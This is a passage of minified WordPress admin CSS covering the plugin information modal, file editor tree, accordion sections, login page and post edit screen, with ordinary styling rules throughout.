h3{margin-top:0}.edit-comment-author{color:#1d2327;border-bottom:1px solid #f0f0f1}#namediv h2 label,#namediv h3 label{vertical-align:baseline}#namediv table{width:100%}#namediv td.first{width:10px;white-space:nowrap}#namediv input{width:100%}#namediv p{margin:10px 0}.zerosize{height:0;width:0;margin:0;border:0;padding:0;overflow:hidden;position:absolute}br.clear{height:2px;line-height:.15}.checkbox{border:none;margin:0;padding:0}fieldset{border:0;padding:0;margin:0}.post-categories{display:inline;margin:0;padding:0}.post-categories li{display:inline}div.star-holder{position:relative;height:17px;width:100px;background:url(../images/stars.png?ver=20121108) repeat-x bottom left}div.star-holder .star-rating{background:url(../images/stars.png?ver=20121108) repeat-x top left;height:17px;float:left}.star-rating{white-space:nowrap}.star-rating .star{display:inline-block;width:20px;height:20px;-webkit-font-smoothing:antialiased;font-size:20px;line-height:1;font-family:dashicons;text-decoration:inherit;font-weight:400;font-style:normal;vertical-align:top;transition:color .1s ease-in;text-align:center;color:#dba617}.star-rating .star-full:before{content:"\f155";content:"\f155"/''}.star-rating .star-half:before{content:"\f459";content:"\f459"/''}.rtl .star-rating .star-half{transform:rotateY(180deg)}.star-rating .star-empty:before{content:"\f154";content:"\f154"/''}div.action-links{font-weight:400;margin:6px 0 0}#plugin-information{background:#fff;position:fixed;top:0;right:0;bottom:0;left:0;height:100%;padding:0}#plugin-information-scrollable{overflow:auto;-webkit-overflow-scrolling:touch;height:100%}#plugin-information-title{padding:0 26px;background:#f6f7f7;font-size:22px;font-weight:600;line-height:2.4;position:relative;height:56px}#plugin-information-title.with-banner{margin-right:0;height:250px;background-size:cover}#plugin-information-title h2{font-size:1em;font-weight:600;padding:0;margin:0;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}#plugin-information-title.with-banner h2{position:relative;font-family:"Helvetica Neue",sans-serif;display:inline-block;font-size:30px;line-height:1.68;box-sizing:border-box;max-width:100%;padding:0 15px;margin-top:174px;color:#fff;background:rgba(29,35,39,.9);text-shadow:0 1px 3px rgba(0,0,0,.4);box-shadow:0 0 30px rgba(255,255,255,.1);border-radius:8px}#plugin-information-title div.vignette{display:none}#plugin-information-title.with-banner div.vignette{position:absolute;display:block;top:0;left:0;height:250px;width:100%;background:0 0;box-shadow:inset 0 0 50px 4px rgba(0,0,0,.2),inset 0 -1px 0 rgba(0,0,0,.1)}#plugin-information-tabs{padding:0 16px;position:relative;right:0;left:0;min-height:36px;font-size:0;z-index:1;border-bottom:1px solid #dcdcde;background:#f6f7f7}#plugin-information-tabs a{position:relative;display:inline-block;padding:9px 10px;margin:0;height:18px;line-height:1.3;font-size:14px;text-decoration:none;transition:none}#plugin-information-tabs a.current{margin:0 -1px -1px;background:#fff;border:1px solid #dcdcde;border-bottom-color:#fff;padding-top:8px;color:#2c3338}#plugin-information-tabs.with-banner a.current{border-top:none;padding-top:9px}#plugin-information-tabs a:active,#plugin-information-tabs a:focus{outline:0}#plugin-information-content{overflow:hidden;background:#fff;position:relative;top:0;right:0;left:0;min-height:100%;min-height:calc(100% - 152px)}#plugin-information-content.with-banner{min-height:calc(100% - 346px)}#section-holder{position:relative;top:0;right:250px;bottom:0;left:0;margin-top:10px;margin-right:250px;padding:10px 26px 99999px;margin-bottom:-99932px}#section-holder .notice{margin:5px 0 15px}#section-holder .updated{margin:16px 0}#plugin-information .fyi{float:right;position:relative;top:0;right:0;padding:16px 16px 99999px;margin-bottom:-99932px;width:217px;border-left:1px solid #dcdcde;background:#f6f7f7;color:#646970}#plugin-information .fyi strong{color:#3c434a}#plugin-information .fyi h3{font-weight:600;text-transform:uppercase;font-size:12px;color:#646970;margin:24px 0 8px}#plugin-information .fyi h2{font-size:.9em;margin-bottom:0;margin-right:0}#plugin-information .fyi ul{padding:0;margin:0;list-style:none}#plugin-information .fyi li{margin:0 0 10px}#plugin-information .fyi-description{margin-top:0}#plugin-information .counter-container{margin:3px 0}#plugin-information .counter-label{float:left;margin-right:5px;min-width:55px}#plugin-information .counter-back{height:17px;width:92px;background-color:#dcdcde;float:left}#plugin-information .counter-bar{height:17px;background-color:#f0c33c;float:left}#plugin-information .counter-count{margin-left:5px}#plugin-information .fyi ul.contributors{margin-top:10px}#plugin-information .fyi ul.contributors li{display:inline-block;margin-right:8px;vertical-align:middle}#plugin-information .fyi ul.contributors li{display:inline-block;margin-right:8px;vertical-align:middle}#plugin-information .fyi ul.contributors li img{vertical-align:middle;margin-right:4px}#plugin-information-footer{padding:13px 16px;position:absolute;right:0;bottom:0;left:0;height:40px;border-top:1px solid #dcdcde;background:#f6f7f7}#plugin-information .section{direction:ltr}#plugin-information .section ol,#plugin-information .section ul{list-style-type:disc;margin-left:24px}#plugin-information .section,#plugin-information .section p{font-size:14px;line-height:1.7}#plugin-information #section-screenshots ol{list-style:none;margin:0}#plugin-information #section-screenshots li img{vertical-align:text-top;margin-top:16px;max-width:100%;width:auto;height:auto;box-shadow:0 1px 2px rgba(0,0,0,.3)}#plugin-information #section-screenshots li p{font-style:italic;padding-left:20px}#plugin-information pre{padding:7px;overflow:auto;border:1px solid #c3c4c7}#plugin-information blockquote{border-left:2px solid #dcdcde;color:#646970;font-style:italic;margin:1em 0;padding:0 0 0 1em}#plugin-information .review{overflow:hidden;width:100%;margin-bottom:20px;border-bottom:1px solid #dcdcde}#plugin-information .review-title-section{overflow:hidden}#plugin-information .review-title-section h4{display:inline-block;float:left;margin:0 6px 0 0}#plugin-information .reviewer-info p{clear:both;margin:0;padding-top:2px}#plugin-information .reviewer-info .avatar{float:left;margin:4px 6px 0 0}#plugin-information .reviewer-info .star-rating{float:left}#plugin-information .review-meta{float:left;margin-left:.75em}#plugin-information .review-body{float:left;width:100%}.plugin-version-author-uri{font-size:13px}.update-php .button.button-primary{margin-right:1em}@media screen and (max-width:771px){#plugin-information-title.with-banner{height:100px}#plugin-information-title.with-banner h2{margin-top:30px;font-size:20px;line-height:2;max-width:85%}#plugin-information-title.with-banner div.vignette{height:100px}#plugin-information-tabs{overflow:hidden;padding:0;height:auto}#plugin-information-tabs a.current{margin-bottom:0;border-bottom:none}#plugin-information .fyi{float:none;border:1px solid #dcdcde;position:static;width:auto;margin:26px 26px 0;padding-bottom:0}#section-holder{position:static;margin:0;padding-bottom:70px}#plugin-information .fyi h3,#plugin-information .fyi small{display:none}#plugin-information-footer{padding:12px 16px 0;height:46px}}#TB_window.plugin-details-modal{background:#fff}#TB_window.plugin-details-modal.thickbox-loading:before{content:"";display:block;width:20px;height:20px;position:absolute;left:50%;top:50%;z-index:-1;margin:-10px 0 0 -10px;background:#fff url(../images/spinner.gif) no-repeat center;background-size:20px 20px;transform:translateZ(0)}@media print,(min-resolution:120dpi){#TB_window.plugin-details-modal.thickbox-loading:before{background-image:url(../images/spinner-2x.gif)}}.plugin-details-modal #TB_title{float:left;height:1px}.plugin-details-modal #TB_ajaxWindowTitle{display:none}.plugin-details-modal #TB_closeWindowButton{left:auto;right:-30px;color:#f0f0f1}.plugin-details-modal #TB_closeWindowButton:focus,.plugin-details-modal #TB_closeWindowButton:hover{outline:0;box-shadow:none}.plugin-details-modal #TB_closeWindowButton:focus::after,.plugin-details-modal #TB_closeWindowButton:hover::after{outline:2px solid;outline-offset:-4px;border-radius:4px}.plugin-details-modal .tb-close-icon{display:none}.plugin-details-modal #TB_closeWindowButton:after{content:"\f335";content:"\f335"/'';font:normal 32px/29px dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}@media screen and (max-width:830px){.plugin-details-modal #TB_closeWindowButton{right:0;top:-30px}}img{border:none}.bulk-action-notice .toggle-indicator::before,.meta-box-sortables .postbox .order-higher-indicator::before,.meta-box-sortables .postbox .order-lower-indicator::before,.meta-box-sortables .postbox .toggle-indicator::before,.privacy-text-box .toggle-indicator::before,.sidebar-name .toggle-indicator::before{content:"\f142";content:"\f142"/'';display:inline-block;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none}.bulk-action-notice .bulk-action-errors-collapsed .toggle-indicator::before,.js .widgets-holder-wrap.closed .toggle-indicator::before,.meta-box-sortables .postbox.closed .handlediv .toggle-indicator::before,.privacy-text-box.closed .toggle-indicator::before{content:"\f140";content:"\f140"/''}.postbox .handle-order-higher .order-higher-indicator::before{content:"\f343";content:"\f343"/'';color:inherit}.postbox .handle-order-lower .order-lower-indicator::before{content:"\f347";content:"\f347"/'';color:inherit}.postbox .handle-order-higher .order-higher-indicator::before,.postbox .handle-order-lower .order-lower-indicator::before{position:relative;top:.11rem;width:20px;height:20px}.postbox .handlediv .toggle-indicator::before{width:20px;border-radius:50%}.postbox .handlediv .toggle-indicator::before{position:relative;top:.05rem;text-indent:-1px}.rtl .postbox .handlediv .toggle-indicator::before{text-indent:1px}.bulk-action-notice .toggle-indicator::before{line-height:16px;vertical-align:top;color:#787c82}.postbox .handle-order-higher:focus,.postbox .handle-order-lower:focus,.postbox .handlediv:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);border-radius:50%;outline:2px solid transparent}.postbox .handle-order-higher:focus .order-higher-indicator::before,.postbox .handle-order-lower:focus .order-lower-indicator::before,.postbox .handlediv:focus .toggle-indicator::before{box-shadow:none;outline:1px solid transparent}#photo-add-url-div input[type=text]{width:300px}.alignleft h2{margin:0}#template textarea{font-family:Consolas,Monaco,monospace;font-size:13px;background:#f6f7f7;tab-size:4}#template .CodeMirror,#template textarea{width:100%;min-height:60vh;height:calc(100vh - 295px);border:1px solid #dcdcde;box-sizing:border-box}#templateside>h2{padding-top:6px;padding-bottom:7px;margin:0}#templateside ol,#templateside ul{margin:0;padding:0}#templateside>ul{box-sizing:border-box;margin-top:0;overflow:auto;padding:0;min-height:60vh;height:calc(100vh - 295px);background-color:#f6f7f7;border:1px solid #dcdcde;border-left:none}#templateside ul ul{padding-left:12px}#templateside>ul>li>ul[role=group]{padding-left:0}[role=treeitem][aria-expanded=false]>ul{display:none}[role=treeitem] span[aria-hidden]{display:inline;font-family:dashicons;font-size:20px;position:absolute;pointer-events:none}[role=treeitem][aria-expanded=false]>.folder-label .icon:after{content:"\f139";content:"\f139"/''}[role=treeitem][aria-expanded=true]>.folder-label .icon:after{content:"\f140";content:"\f140"/''}[role=treeitem] .folder-label{display:block;padding:3px 3px 3px 12px;cursor:pointer}[role=treeitem]{outline:0}[role=treeitem] .folder-label.focus,[role=treeitem] a:focus{color:#043959;box-shadow:none;outline:2px solid var(--wp-admin-theme-color,#3858e9);outline-offset:-2px}[role=treeitem] .folder-label.hover,[role=treeitem].hover{background-color:#f0f0f1}.tree-folder{margin:0;position:relative}[role=treeitem] li{position:relative}.tree-folder .tree-folder::after{content:"";display:block;position:absolute;left:2px;border-left:1px solid #c3c4c7;top:-13px;bottom:10px}.tree-folder>li::before{content:"";position:absolute;display:block;border-left:1px solid #c3c4c7;left:2px;top:-5px;height:18px;width:7px;border-bottom:1px solid #c3c4c7}.tree-folder>li::after{content:"";position:absolute;display:block;border-left:1px solid #c3c4c7;left:2px;bottom:-7px;top:0}#templateside .current-file{margin:-4px 0 -2px}.tree-folder>.current-file::before{left:4px;height:15px;width:0;border-left:none;top:3px}.tree-folder>.current-file::after{bottom:-4px;height:7px;left:2px;top:auto}.tree-folder li:last-child>.tree-folder::after,.tree-folder>li:last-child::after{display:none}#documentation label,#theme-plugin-editor-label,#theme-plugin-editor-selector{font-weight:600}#theme-plugin-editor-label{display:inline-block;margin-bottom:1em}#docs-list,#template textarea{direction:ltr}.fileedit-sub #plugin,.fileedit-sub #theme{max-width:40%}.fileedit-sub .alignright{text-align:right}#template p{width:97%}#file-editor-linting-error{margin-top:1em;margin-bottom:1em}#file-editor-linting-error>.notice{margin:0;display:inline-block}#file-editor-linting-error>.notice>p{width:auto}#template .submit{margin-top:1em;padding:0}#template .submit input[type=submit][disabled]{cursor:not-allowed}#templateside{float:right;width:16em;word-wrap:break-word}#postcustomstuff p.submit{margin:0}#templateside h4{margin:1em 0 0}#templateside li{margin:4px 0}#templateside li:not(.howto) a,.theme-editor-php .highlight{display:block;padding:3px 0 3px 12px;text-decoration:none}#templateside li.current-file>a{padding-bottom:0}#templateside li:not(.howto)>a:first-of-type{padding-top:0}#templateside li.howto{padding:6px 12px 12px}.theme-editor-php .highlight{margin:-3px 3px -3px -12px}#templateside .highlight{border:none;font-weight:600}.nonessential{color:#646970;font-size:11px;font-style:italic;padding-left:12px}#documentation{margin-top:10px}#documentation label{line-height:1.8;vertical-align:baseline}.fileedit-sub{padding:10px 0 8px;line-height:180%}#file-editor-warning .file-editor-warning-content{margin:25px}.nav-menus-php .item-edit:before,.widget-top .widget-action .toggle-indicator:before,.wp-customizer .accordion-section-title:after,.wp-customizer .control-section .accordion-section-title:after{content:"\f140";content:"\f140"/'';font:normal 20px/1 dashicons;display:block;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none}.widget-top .widget-action .toggle-indicator:before{padding:1px 2px 1px 0;border-radius:50%}.handlediv,.item-edit,.postbox .handlediv.button-link,.toggle-indicator{color:#646970}.widget-action{color:#50575e}.handlediv:focus,.handlediv:hover,.item-edit:focus,.item-edit:hover,.postbox .handlediv.button-link:focus,.postbox .handlediv.button-link:hover,.sidebar-name:hover .toggle-indicator,.widget-action:focus,.widget-top:hover .widget-action{color:#1d2327;outline:2px solid transparent}.widget-top .widget-action:focus .toggle-indicator:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#customize-info.open .accordion-section-title:after,.nav-menus-php .menu-item-edit-active .item-edit:before,.widget.open .widget-top .widget-action .toggle-indicator:before,.widget.widget-in-question .widget-top .widget-action .toggle-indicator:before{content:"\f142";content:"\f142"/''}/*! * jQuery UI Draggable/Sortable 1.11.4 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */.ui-draggable-handle,.ui-sortable-handle{touch-action:none}.accordion-section{border-bottom:1px solid #dcdcde;margin:0}.accordion-section.open .accordion-section-content,.no-js .accordion-section .accordion-section-content{display:block}.accordion-section.open:hover{border-bottom-color:#dcdcde}.accordion-section-content{display:none;padding:10px 20px 15px;overflow:hidden;background:#fff}.accordion-section-title{margin:0;position:relative;border-left:1px solid #dcdcde;border-right:1px solid #dcdcde;-webkit-user-select:none;user-select:none}.js .accordion-section-title{cursor:pointer}.js .accordion-section-title:after{position:absolute;top:12px;right:10px;z-index:1}.accordion-section-title:focus{outline:1px solid transparent}.accordion-section-title:focus:after,.accordion-section-title:hover:after{border-color:#a7aaad transparent;outline:1px solid transparent}.cannot-expand .accordion-section-title{cursor:auto}.cannot-expand .accordion-section-title:after{display:none}.control-section .accordion-section-title,.customize-pane-child .accordion-section-title{border-left:none;border-right:none;padding:10px 10px 11px 14px;line-height:1.55;background:#fff}.control-section .accordion-section-title:after,.customize-pane-child .accordion-section-title:after{top:calc(50% - 10px)}.js .control-section .accordion-section-title:focus,.js .control-section .accordion-section-title:hover,.js .control-section.open .accordion-section-title,.js .control-section:hover .accordion-section-title{color:#1d2327;background:#f6f7f7}.control-section.open .accordion-section-title{border-bottom:1px solid #dcdcde}.network-admin .edit-site-actions{margin-top:0}.my-sites{display:block;overflow:auto;zoom:1}.my-sites li{display:block;padding:8px 3%;min-height:130px;margin:0}@media only screen and (max-width:599px){.my-sites li{min-height:0}}@media only screen and (min-width:600px){.my-sites.striped li{background-color:#fff;position:relative}.my-sites.striped li:after{content:"";width:1px;height:100%;position:absolute;top:0;right:0;background:#c3c4c7}}@media only screen and (min-width:600px) and (max-width:699px){.my-sites li{float:left;width:44%}.my-sites.striped li{background-color:#fff}.my-sites.striped li:nth-of-type(odd){clear:left}.my-sites.striped li:nth-of-type(2n+2):after{content:none}.my-sites li:nth-of-type(4n+1),.my-sites li:nth-of-type(4n+2){background-color:#f6f7f7}}@media only screen and (min-width:700px) and (max-width:1199px){.my-sites li{float:left;width:27.333333%;background-color:#fff}.my-sites.striped li:nth-of-type(3n+3):after{content:none}.my-sites li:nth-of-type(6n+1),.my-sites li:nth-of-type(6n+2),.my-sites li:nth-of-type(6n+3){background-color:#f6f7f7}}@media only screen and (min-width:1200px) and (max-width:1399px){.my-sites li{float:left;width:21%;padding:8px 2%;background-color:#fff}.my-sites.striped li:nth-of-type(4n+1){clear:left}.my-sites.striped li:nth-of-type(4n+4):after{content:none}.my-sites li:nth-of-type(8n+1),.my-sites li:nth-of-type(8n+2),.my-sites li:nth-of-type(8n+3),.my-sites li:nth-of-type(8n+4){background-color:#f6f7f7}}@media only screen and (min-width:1400px) and (max-width:1599px){.my-sites li{float:left;width:16%;padding:8px 2%;background-color:#fff}.my-sites.striped li:nth-of-type(5n+1){clear:left}.my-sites.striped li:nth-of-type(5n+5):after{content:none}.my-sites li:nth-of-type(10n+1),.my-sites li:nth-of-type(10n+2),.my-sites li:nth-of-type(10n+3),.my-sites li:nth-of-type(10n+4),.my-sites li:nth-of-type(10n+5){background-color:#f6f7f7}}@media only screen and (min-width:1600px){.my-sites li{float:left;width:12.666666%;padding:8px 2%;background-color:#fff}.my-sites.striped li:nth-of-type(6n+1){clear:left}.my-sites.striped li:nth-of-type(6n+6):after{content:none}.my-sites li:nth-of-type(12n+1),.my-sites li:nth-of-type(12n+2),.my-sites li:nth-of-type(12n+3),.my-sites li:nth-of-type(12n+4),.my-sites li:nth-of-type(12n+5),.my-sites li:nth-of-type(12n+6){background-color:#f6f7f7}}.my-sites li a{text-decoration:none}@media print,(min-resolution:120dpi){div.star-holder,div.star-holder .star-rating{background:url(../images/stars-2x.png?ver=20121108) repeat-x bottom left;background-size:21px 37px}.spinner{background-image:url(../images/spinner-2x.gif)}}@media screen and (max-width:782px){html.wp-toolbar{padding-top:var(--wp-admin--admin-bar--height)}.screen-reader-shortcut:focus{top:-39px}.block-editor-page .screen-reader-shortcut:focus{top:7px}.screen-reader-shortcut[href="#wp-toolbar"]{display:none}body{min-width:240px;overflow-x:hidden}body *{-webkit-tap-highlight-color:transparent!important}#wpcontent{position:relative;margin-left:0;padding-left:10px}#wpbody-content{padding-bottom:100px}.wrap{clear:both;margin-right:12px;margin-left:0}#col-left,#col-right{float:none;width:auto}#col-left .col-wrap,#col-right .col-wrap{padding:0}#collapse-menu,.post-format-select{display:none!important}.wrap h1.wp-heading-inline{margin-bottom:.5em}.wrap .add-new-h2,.wrap .add-new-h2:active,.wrap .page-title-action,.wrap .page-title-action:active{padding:0 14px;font-size:14px;white-space:nowrap;min-height:40px;line-height:2.71428571;vertical-align:middle}.media-upload-form div.error,.notice,.wrap div.error,.wrap div.updated{margin:20px 0 10px;padding:5px 10px;font-size:14px;line-height:175%}.wp-core-ui .notice.is-dismissible{padding-right:46px}.notice-dismiss{padding:13px}.wrap .icon32+h2{margin-top:-2px}.wp-responsive-open #wpbody{right:-16em}code{word-wrap:break-word;word-wrap:anywhere;word-break:break-word}.postbox{font-size:14px}.metabox-holder .postbox>h3,.metabox-holder .stuffbox>h3,.metabox-holder h2,.metabox-holder h3.hndle{padding:12px}.nav-menus-php .metabox-holder h3{padding:0}.postbox .handlediv{margin-top:3px}.subsubsub{font-size:16px;text-align:center;margin-bottom:15px}#template .CodeMirror,#template textarea{box-sizing:border-box}#templateside{float:none;width:auto}#templateside>ul{border-left:1px solid #dcdcde}#templateside li{margin:0}#templateside li:not(.howto) a{display:block;padding:5px}#templateside li.howto{padding:12px}#templateside .highlight{padding:5px;margin-left:-5px;margin-top:-5px}#template .notice,#template>div{float:none;margin:1em 0;width:auto}#template .CodeMirror,#template textarea{width:100%}#templateside ul ul{padding-left:1.5em}[role=treeitem] .folder-label{display:block;padding:5px}.tree-folder .tree-folder::after,.tree-folder>li::after,.tree-folder>li::before{left:-8px}.tree-folder>li::before{top:0;height:13px}.tree-folder>.current-file::before{left:-5px;top:7px;width:4px}.tree-folder>.current-file::after{height:9px;left:-8px}.wrap #templateside span.notice{margin-left:-5px;width:100%}.fileedit-sub .alignright{float:left;margin-top:15px;width:100%;text-align:left}.fileedit-sub .alignright label{display:block}.fileedit-sub #plugin,.fileedit-sub #theme{margin-left:0;max-width:70%}.fileedit-sub input[type=submit]{margin-bottom:0}#documentation label[for=docs-list]{display:block}#documentation select[name=docs-list]{margin-left:0;max-width:60%}#documentation input[type=button]{margin-bottom:0}#wpfooter{display:none}#comments-form .checkforspam{display:none}.edit-comment-author{margin:2px 0 0}.filter-drawer .filter-group-feature input,.filter-drawer .filter-group-feature label{line-height:2.1}.filter-drawer .filter-group-feature label{margin-left:32px}.wp-filter .button.drawer-toggle{font-size:13px;line-height:2;height:28px}#screen-meta #contextual-help-wrap{overflow:visible}#screen-meta #contextual-help-back,#screen-meta .contextual-help-sidebar{display:none}#screen-meta .contextual-help-tabs{clear:both;width:100%;float:none}#screen-meta .contextual-help-tabs ul{margin:0 0 1em;padding:1em 0 0}#screen-meta .contextual-help-tabs .active{margin:0}#screen-meta .contextual-help-tabs-wrap{clear:both;max-width:100%;float:none}#screen-meta,#screen-meta-links{margin-right:10px}#screen-meta-links{margin-bottom:20px}#screen-meta-links .show-settings:after{line-height:1.9}.wp-filter .search-form input[type=search]{font-size:1rem}.wp-filter .search-form.search-plugins{min-width:100%}}@media screen and (max-width:600px){#wpwrap.wp-responsive-open{overflow-x:hidden}html.wp-toolbar{padding-top:0}.screen-reader-shortcut:focus{top:7px}#wpbody{padding-top:46px}div#post-body.metabox-holder.columns-1{overflow-x:hidden}.nav-tab-wrapper,.wrap h2.nav-tab-wrapper,h1.nav-tab-wrapper{border-bottom:0}h1 .nav-tab,h2 .nav-tab,h3 .nav-tab,nav .nav-tab{margin:10px 10px 0 0;border-bottom:1px solid #c3c4c7}.nav-tab-active:focus,.nav-tab-active:focus:active,.nav-tab-active:hover{border-bottom:1px solid #c3c4c7}.wp-filter .search-form.search-plugins label{width:100%}}@media screen and (max-width:480px){.metabox-prefs-container{display:grid}.metabox-prefs-container>*{display:inline-block;padding:2px}}@media screen and (max-width:320px){#network_dashboard_right_now .subsubsub{font-size:14px;text-align:left}}/*! This file is auto-generated */ body,html{height:100%;margin:0;padding:0}body{background:#f0f0f1;min-width:0;color:#3c434a;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;font-size:13px;line-height:1.4}a{color:var(--wp-admin-theme-color-darker-10);transition-property:border,background,color;transition-duration:.05s;transition-timing-function:ease-in-out}a{outline:0}a:active,a:hover{color:var(--wp-admin-theme-color-darker-20)}a:focus{color:#043959;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}p{line-height:1.5}.login .message,.login .notice,.login .success{border-left:4px solid #3858e9;padding:8px 12px;margin-top:0;margin-left:0;margin-bottom:20px;background-color:#fff;word-wrap:break-word}.login .message p,.login .notice p,.login .success p{font-size:13px;line-height:1.54;margin:.5em 0}.login .success{border-left-color:#4ab866;background-color:#eff9f1}.login .notice-error{border-left-color:#cc1818;background-color:#fcf0f0}.login .login-error-list{list-style:none}.login .login-error-list li+li{margin-top:4px}#loginform p.submit,.login-action-lostpassword p.submit{border:none;margin:-10px 0 20px}.login *{margin:0;padding:0}.login .input::-ms-clear{display:none}.login .pw-weak{margin-bottom:15px}.login .button.wp-hide-pw{background:0 0;border:1px solid transparent;box-shadow:none;font-size:14px;line-height:normal;width:2.5rem;height:2.5rem;min-width:40px;min-height:40px;margin:0;padding:5px 9px;position:absolute;right:0;top:0}.login .button.wp-hide-pw:hover{background:0 0}.login .button.wp-hide-pw:focus{background:0 0;border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 1px var(--wp-admin-theme-color);outline:2px solid transparent}.login .button.wp-hide-pw:active{background:0 0;box-shadow:none;transform:none}.login .button.wp-hide-pw .dashicons{width:1.25rem;height:1.25rem}.login .wp-pwd{position:relative}.no-js .hide-if-no-js{display:none}.login form{margin:24px 0;padding:26px 24px;font-weight:400;overflow:hidden;background:#fff;border:1px solid #c3c4c7;box-shadow:0 1px 3px rgba(0,0,0,.04)}.login form.shake{animation:shake .2s cubic-bezier(.19,.49,.38,.79) both;animation-iteration-count:3;transform:translateX(0)}@keyframes shake{25%{transform:translateX(-20px)}75%{transform:translateX(20px)}100%{transform:translateX(0)}}@media (prefers-reduced-motion:reduce){.login form.shake{animation:none;transform:none}}.login-action-confirm_admin_email #login{width:60vw;max-width:650px;margin-top:-2vh}@media screen and (max-width:782px){.login-action-confirm_admin_email #login{box-sizing:border-box;margin-top:0;padding-left:4vw;padding-right:4vw;width:100vw}}.login form .forgetmenot{font-weight:400;float:left;margin-bottom:0}.login .button-primary{float:right}.login .reset-pass-submit{display:flex;flex-flow:row wrap;justify-content:space-between}.login .reset-pass-submit .button{display:inline-block;float:none;margin-bottom:6px}.login .admin-email-confirm-form .submit{text-align:center}.admin-email__later{text-align:left}.login form p.admin-email__details{margin:1.1em 0}.login .admin-email__heading{border-bottom:1px #f0f0f1 solid;color:#50575e;font-weight:400;padding-bottom:.5em;text-align:left}.admin-email__actions div{padding-top:1.5em}.login .admin-email__actions .button-primary{float:none;margin-left:.25em;margin-right:.25em}#login form p{margin-bottom:0}#login #reg_passmail,#login form .indicator-hint{margin-bottom:16px}#login form p.submit{margin:0;padding:0}.login label{font-size:14px;line-height:1.5;display:inline-block;margin-bottom:3px}.login .forgetmenot label,.login .pw-weak label{line-height:1.5;vertical-align:baseline}.login h1{text-align:center}.login h1 a{background-image:url(../images/w-logo-gray.png?ver=20260303);background-image:none,url(../images/wordpress-logo-gray.svg?ver=20260303);background-size:84px;background-position:center top;background-repeat:no-repeat;color:#3c434a;height:84px;font-size:20px;font-weight:400;line-height:1.3;margin:0 auto 24px;padding:0;text-decoration:none;width:84px;text-indent:-9999px;outline:0;overflow:hidden;display:block}#login{width:320px;padding:5% 0 0;margin:auto}.login #backtoblog,.login #nav{font-size:13px;padding:0 24px}.login #nav{margin:24px 0 0}#backtoblog{margin:16px 0;word-wrap:break-word}.login #backtoblog a,.login #nav a{text-decoration:none;color:#50575e}.login #backtoblog a:hover,.login #nav a:hover,.login h1 a:hover{color:var(--wp-admin-theme-color-darker-20)}.login #backtoblog a:focus,.login #nav a:focus,.login h1 a:focus{color:#043959}.login .privacy-policy-page-link{text-align:center;width:100%;margin:3em 0 2em}.login form .input,.login input[type=password],.login input[type=text]{font-size:24px;line-height:1.33333333;width:100%;border-width:.0625rem;padding:.1875rem .3125rem;margin:0 6px 16px 0;min-height:40px;max-height:none}.login input.password-input{font-family:Consolas,Monaco,monospace}.js.login input.password-input{padding-right:2.5rem}.js.login-action-resetpass input[type=password],.js.login-action-resetpass input[type=text],.js.login-action-rp input[type=password],.js.login-action-rp input[type=text]{margin-bottom:0}.login #pass-strength-result{font-weight:600;margin:-1px 5px 16px 0;padding:6px 5px;text-align:center;width:100%}body.interim-login{height:auto}.interim-login #login{padding:0;margin:5px auto 20px}.interim-login.login h1 a{width:auto}.interim-login #login_error,.interim-login.login .message{margin:0 0 16px}.interim-login.login form{margin:0}.screen-reader-text,.screen-reader-text span{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important;word-break:normal!important}input::-ms-reveal{display:none}#language-switcher{padding:0;overflow:visible;background:0 0;border:none;box-shadow:none}#language-switcher select{margin-right:.25em}.language-switcher{margin:0 auto;padding:0 0 24px;text-align:center}.language-switcher label{margin-right:.25em}.language-switcher label .dashicons{width:auto;height:auto}.login .language-switcher .button{margin-bottom:0}@media screen and (max-height:550px){#login{padding:20px 0}#language-switcher{margin-top:0}}@media screen and (max-width:782px){.interim-login input[type=checkbox]{width:1rem;height:1rem}.interim-login input[type=checkbox]:checked:before{width:1.3125rem;height:1.3125rem;margin:-.1875rem 0 0 -.25rem}#language-switcher label,#language-switcher select{margin-right:0}}@media screen and (max-width:400px){.login .language-switcher .button{display:block;margin:5px auto 0}}/*! This file is auto-generated */ #poststuff{padding-top:10px;min-width:763px}#poststuff #post-body{padding:0}#poststuff .postbox-container{width:100%}#poststuff #post-body.columns-2{margin-right:300px}#show-comments{overflow:hidden}#save-action .spinner,#show-comments a{float:left}#show-comments .spinner{float:none;margin-top:0}#lost-connection-notice .spinner{visibility:visible;float:left;margin:0 5px 0 0}#titlediv{position:relative}#titlediv label{cursor:text}#titlediv div.inside{margin:0}#poststuff #titlewrap{border:0;padding:0}#titlediv #title{padding:3px 8px;font-size:1.7em;line-height:100%;height:1.7em;width:100%;outline:0;margin:0 0 3px;background-color:#fff}#titlediv #title-prompt-text{color:#646970;position:absolute;font-size:1.7em;padding:10px;pointer-events:none}#titlewrap .skiplink{background:#fff;line-height:2.30769231;min-height:32px;right:4px}#titlewrap .skiplink:focus{clip:inherit;clip-path:inherit;top:4px;width:auto}input#link_description,input#link_url{width:100%}#pending{background:0 none;border:0 none;padding:0;font-size:11px;margin-top:-1px}#comment-link-box,#edit-slug-box{line-height:1.84615384;min-height:25px;margin-top:5px;padding:0 10px;color:#646970}#sample-permalink{display:inline-block;max-width:100%;word-wrap:break-word}#edit-slug-box .cancel{margin-right:10px;padding:0}#comment-link-box{margin:5px 0;padding:0 5px}#editable-post-name-full{display:none}#editable-post-name{font-weight:600}#editable-post-name input{font-size:13px;font-weight:400;min-height:32px;margin:0;width:16em}.postarea h3 label{float:left}body.post-new-php .submitbox .submitdelete{display:none}.submitbox .submit a:hover{text-decoration:underline}.submitbox .submit input{margin-bottom:8px;margin-right:4px;padding:6px}#post-status-select{margin-top:3px}body.post-type-wp_navigation .inline-edit-status,body.post-type-wp_navigation 